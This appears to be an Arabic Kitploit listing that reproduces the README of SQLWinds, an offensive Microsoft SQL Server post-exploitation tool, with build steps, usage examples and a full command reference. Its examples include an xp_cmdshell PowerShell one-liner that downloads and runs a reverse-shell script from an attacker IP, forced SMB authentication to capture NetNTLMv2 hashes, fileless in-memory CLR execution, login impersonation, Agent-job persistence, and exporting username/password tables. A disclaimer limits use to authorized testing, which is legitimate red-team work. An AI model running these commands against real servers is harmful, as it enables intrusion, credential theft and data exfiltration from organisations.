Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
sqlwinds — SQLWinds - مجموعة أدوات تقييم أمان SQL Server والاستغلال ما بعد الاختراق | Kitploit
أدوات/GitHubGitHub/blue0x1/sqlwinds
تصعيد الامتيازاتآليات الاستمراريةالاستغلالالحركة الجانبيةتدقيق التكوينتسريب البياناتما بعد الاستغلالاختبار الاختراقالفريق الأحمرأمن قواعد البيانات
GitHubblue0x1/sqlwinds

sqlwinds

1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

SQLWinds - مجموعة أدوات تقييم أمان SQL Server والاستغلال ما بعد الاختراق

عرض المستودع

SQLWinds

أداة تقييم أمان SQL وأداة ما بعد الاستغلال

SQLWinds هي أداة سطر أوامر لاختبار الأمان واستغلال Microsoft SQL Server. وهي توفر بيئة تفاعلية لتحليل الخوادم بعمق، وتصعيد الصلاحيات، وتنفيذ الهجمات، والتنقل عبر الشبكات باستخدام أوامر متخصصة لمهام مثل تنفيذ الكود في الذاكرة واستكشاف قاعدة بيانات SCCM.


SQLWinds


📖 التوثيق والموارد

Wiki Issues Releases

روابط سريعة:

  • التوثيق الكامل والويكي - دليل الاستخدام الكامل ومرجع الأوامر
  • الإبلاغ عن مشكلة - هل وجدت خطأ أو لديك طلب ميزة؟
  • أحدث إصدار - تحميل أحدث نسخة

الميزات

  • مصادقة متنوعة: يدعم SQL، ومصادقة Windows المتكاملة (--integrated)، وتفويض Kerberos (--kerberos مع --user/--pass).
  • تعداد شامل:
    • معلومات الخادم، وقواعد البيانات، والجداول، والأعمدة، والمستخدمون، والصلاحيات.
    • تدقيق إعدادات الأمان (xp_cmdshell، CLR، OLE، وغيرها).
    • اكتشاف البيانات الحساسة واستخراج الأسرار.
    • تعداد الخوادم المرتبطة واستغلالها.
  • ما بعد الاستغلال والحركة الجانبية:
    • تنفيذ الكود: تمكين واستخدام xp_cmdshell، وإجراءات OLE Automation (sp_oacreate)، وتكامل CLR.
    • CLR في الذاكرة: تحميل وتنفيذ تجميعات .NET مباشرة من الذاكرة دون حفظ ملفات على القرص (:memclr).
    • سرقة بيانات الاعتماد: فرض مصادقة SMB إلى مسار UNC لهجمات الترحيل (:unc_smb).
    • التفاعل مع السجل: قراءة مفاتيح وقيم السجل عبر xp_regread.
    • الثبات: إنشاء وسرد وتنفيذ وظائف SQL Agent Jobs.
    • سرقة البيانات: رفع/تنزيل الملفات وتصدير نتائج الاستعلامات إلى CSV/JSON.
  • التفاعل مع قاعدة بيانات SCCM: (إذا كانت قاعدة البيانات الهدف هي SCCM)

التثبيت والترجمة

بناء سريع

يحتوي المستودع على سكربت build.bat للترجمة بسهولة على Windows:

root@kitploit:~
.\build.bat

سيتم وضع الملف التنفيذي SQLWinds.exe المترجم في مجلد bin\Release\.

بناء يدوي

  1. تأكد من تثبيت .NET Framework (≥ 4.6.1) أو .NET SDK.
  2. استنسخ المستودع:
    root@kitploit:~
    git clone https://github.com/blue0x1/sqlwinds.git
    cd sqlwinds
    
  3. ترجمة الحل:
    root@kitploit:~
    msbuild SQLWinds.sln /p:Configuration=Release
    

الاستخدام

الاتصال الأساسي

root@kitploit:~
# مصادقة SQL
SQLWinds.exe --server TARGET\\INSTANCE --user sa --pass Password123

# مصادقة Windows (سياق المستخدم الحالي)
SQLWinds.exe --server sql01.corp.local --integrated

# تفويض Kerberos (مع توفير بيانات الاعتماد)
SQLWinds.exe --server sql01.prod.corp.local --kerberos --user CORP\\svc_sql --pass SvcPass123!

# الاتصال وتنفيذ أمر واحد
SQLWinds.exe --server 10.0.0.5 --user sa --pass pass --run-cmd "SELECT name FROM sys.databases"

خيارات سطر الأوامر الشائعة

وضع REPL التفاعلي

root@kitploit:~
sqlwinds> :info
sqlwinds> :dbs
sqlwinds> :users
sqlwinds> :enable_xp_cmdshell
sqlwinds> :xp whoami
sqlwinds> :spn
sqlwinds> help

مرجع أوامر REPL الكامل

مثال: استخدام :plain للسكربتات الكبيرة

يعد أمر :plain ضروريًا لتنفيذ سكربتات SQL الكبيرة متعددة الأسطر.

root@kitploit:~
sqlwinds> :plain
SQL> 
SQL> BEGIN TRY
.....>     SELECT * FROM [VeryImportantTable];
.....>     EXEC sp_configure 'show advanced options', 1;
.....>     RECONFIGURE;
.....> END TRY
.....> BEGIN CATCH
.....>     SELECT ERROR_MESSAGE();
.....> END CATCH
.....> :execute
  1. اكتب :plain ثم اضغط Enter.
  2. الصق أو اكتب سكربت SQL الكامل.
  3. في سطر جديد، اكتب :execute لتشغيل السكربت بالكامل أو :cancel للإلغاء.

أمثلة

1. التدقيق

root@kitploit:~
SQLWinds.exe --server dc01 --integrated --security-audit 

2. الاستفادة من xp_cmdshell لتنفيذ الكود

root@kitploit:~
SQLWinds.exe --server 192.168.1.15 --user sa --pass pass --enable-xp-cmdshell
# في REPL الذي يُفتح:
sqlwinds> :xp whoami /all
sqlwinds> :xp powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.10/revshell.ps1')"

3. تنفيذ CLR في الذاكرة (بدون ملفات)

root@kitploit:~
# قم بترجمة تجميع .NET إلى DLL (مثل CommandExecutor.dll)
sqlwinds> :enable_clr
sqlwinds> :memclr "C:\Tools\CommandExecutor.dll" "CommandExecutor.Class1" "Exec" "whoami"

4. سرقة تجزئات NetNTLMv2 عبر SRelay

root@kitploit:~
# على جهازك: sudo responder -I tun0
sqlwinds> :unc_smb \\10.10.15.10\fake_share

5. استغلال قاعدة بيانات SCCM

root@kitploit:~
SQLWinds.exe --server sccmdb.corp.local --integrated
sqlwinds> :sccm_info
sqlwinds> :sccm_collections
sqlwinds> :sccm_application "Microsoft 365"

6. سرقة البيانات

root@kitploit:~
# تصدير البيانات الحساسة إلى CSV
sqlwinds> :exportcsv "SELECT username, password FROM users" credentials.csv

# تنزيل ملف مخزن في قاعدة البيانات
sqlwinds> :download "SELECT file_data FROM documents WHERE id=1" secret.docx

🤝 المساهمة والدعم

نرحب بالمساهمات! إذا كانت لديك أفكار للتحسين أو وجدت أي مشكلات:

  1. راجع الويكي للتوثيق
  2. ابحث في المشكلات الحالية لتجنب التكرار
  3. أنشئ مشكلة جديدة بمعلومات مفصلة حول اقتراحك أو تقرير الخطأ

⚠️ إخلاء مسؤولية

هذه الأداة مخصصة لاختبارات الأمان المصرح بها والأغراض التعليمية فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها هو أمر غير قانوني. لا يتحمل المطورون أي مسؤولية ولا يتحملون مسؤولية أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.


الاعتمادات

تم التطوير بواسطة blue0x1.

تنزيل الأداة
  • اكتشاف SCCM والإبلاغ عن معلومات الإصدار/الموقع.
  • جرد الأجهزة والبرامج والمجموعات والنشرات.
  • إجراء تدقيقات أمان خاصة بـ SCCM.
  • تحليل Kerberos: التحقق من Active Directory بحثًا عن SPNs المرتبطة بالهدف لاستكشاف مشكلات مصادقة Kerberos.
  • اكتشاف المثيلات: تعداد مثيلات SQL Server المتاحة في المجال.
  • REPL متقدم: بيئة تفاعلية مع إكمال تلقائي وسجل أوامر.
  • الخيارالوصف
    --serverالخادم الهدف (IP، اسم المضيف، مثيل). مطلوب.
    --user, --passبيانات الاعتماد لمصادقة SQL أو Windows.
    --integratedاستخدام رمز Windows الحالي للمصادقة.
    --kerberosاستخدام تدفق مصادقة Kerberos.
    --spn-checkالتحقق من AD بحثًا عن SPNs للمضيف الهدف.
    --run-cmd "<SQL>"تنفيذ أمر SQL واحد ثم الخروج.
    --run-file file.sqlتنفيذ سكربت SQL من ملف ثم الخروج.
    --infoجمع وعرض معلومات موسعة عن الخادم.
    --getinstanceاكتشاف مثيلات SQL في المجال ثم الخروج.
    --list-dbsسرد قواعد البيانات ثم الخروج.
    --security-auditإجراء تدقيق أمني ثم الخروج.
    الأمرالوصفمثال
    :infoعرض معلومات مفصلة عن الخادم:info
    :dbsسرد جميع قواعد البيانات مع التفاصيل:dbs
    :tables [db] [schema]سرد الجداول في قاعدة بيانات/مخطط:tables master dbo
    :columns <table> [schema] [db]سرد الأعمدة لجدول:columns Users dbo MyDatabase
    :usersسرد جميع عمليات تسجيل دخول SQL ومستخدمي قواعد البيانات:users
    :permsعرض صلاحيات المستخدم الحالي:perms
    :auditإجراء تدقيق إعدادات الأمان:audit
    :search [term]البحث عن بيانات حساسة:search password
    :secretsاستخراج الأسرار المحتملة:secrets
    :servicesعرض حسابات خدمة SQL Server:services
    :spnالتحقق من SPNs للمضيف الهدف:spn
    :enable_xp_cmdshellتمكين xp_cmdshell:enable_xp_cmdshell
    :disable_xp_cmdshellتعطيل xp_cmdshell:disable_xp_cmdshell
    :xp <command>تشغيل أمر نظام عبر xp_cmdshell:xp whoami
    :enable_oleتمكين OLE Automation:enable_ole
    :disable_oleتعطيل OLE Automation:disable_ole
    :ole_cmd <command>تشغيل أمر نظام عبر OLE:ole_cmd "calc.exe"
    :enable_clrتمكين تكامل CLR:enable_clr
    :disable_clrتعطيل تكامل CLR:disable_clr
    :deploy-clr <path>نشر تجميع CLR من ملف:deploy-clr C:\Tools\cmd.dll
    :list-assembliesسرد تجميعات CLR المنشورة:list-assemblies
    :clr_execتنفيذ أسلوب CLR:clr_exec MyAssembly MyClass Method arg1
    :memclrتنفيذ تجميع CLR من الذاكرة:memclr "C:\Tools\exec.dll" "Namespace.Class" "Method" "arg"
    :remove-assembly <name>إزالة تجميع CLR:remove-assembly MyAssembly
    :list_linkserversسرد الخوادم المرتبطة:list_linkservers
    :linkrpc <srv> <cmd>تنفيذ أمر عبر خادم مرتبط:linkrpc LINKEDSRV "whoami"
    :impersonate <login>انتحال صفة تسجيل دخول SQL:impersonate sa
    :revertالتراجع عن سياق الأمان:revert
    :agent_jobإدارة وظائف SQL Agent:agent_job create MyJob "whoami"
    :ls [path]سرد مجلد عبر SQL:ls C:\Windows\Temp
    :unc_smb <path>فرض مصادقة SMB إلى UNC:unc_smb \\192.168.1.100\share
    :plainلصق سكربتات SQL كبيرة(انظر المثال أدناه)
    :regreadقراءة قيمة سجل:regread HKEY_LOCAL_MACHINE Software\Microsoft value
    :regread_allسرد جميع القيم في مفتاح:regread_all HKEY_LOCAL_MACHINE Software\Microsoft
    :uploadرفع ملف إلى جدول:upload C:\file.txt MyTable
    :downloadتنزيل بيانات ثنائية من استعلام:download "SELECT file FROM blobs" out.bin
    :exportcsvتصدير استعلام إلى CSV:exportcsv "SELECT * FROM users" out.csv
    :exportjsonتصدير استعلام إلى JSON:exportjson "SELECT * FROM users" out.json
    :sccm_infoاكتشاف قاعدة بيانات SCCM:sccm_info
    :sccm_inventoryعرض جرد SCCM:sccm_inventory
    :sccm_collectionsسرد مجموعات SCCM:sccm_collections "All Systems"
    :sccm_deploymentsعرض النشرات:sccm_deployments
    :sccm_clientsسرد العملاء:sccm_clients inactive
    :sccm_auditتدقيق أمان SCCM:sccm_audit
    :sccm_applicationعرض تفاصيل التطبيق:sccm_application "Google Chrome"
    helpعرض المساعدةhelp
    exitالخروج من REPLexit